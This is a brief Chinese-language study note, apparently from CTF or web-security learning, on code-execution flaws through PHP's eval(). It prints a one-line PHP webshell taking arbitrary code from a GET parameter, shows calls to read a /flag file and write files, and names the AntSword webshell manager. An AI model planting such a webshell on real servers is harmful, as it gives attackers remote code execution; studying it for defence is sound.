应用程序在调用一些能够将字符串转换为代码的函数(如PHP中的eval()函数) 代码执行 一句话木马shell.php: eval($_GET['cmd']); //从参数cmd获取任意代码来执行 shell.php?cmd=phpinfo(); //将phpinfo作为参数 传进去shell脚本 执行 file_get_contents("/flag"); //读取flag文件内容 (返回值为内容 需要配合echo打印) file_put_contents("filename","data"); //将data输出到filename文件中 一句话木马管理工具:蚁剑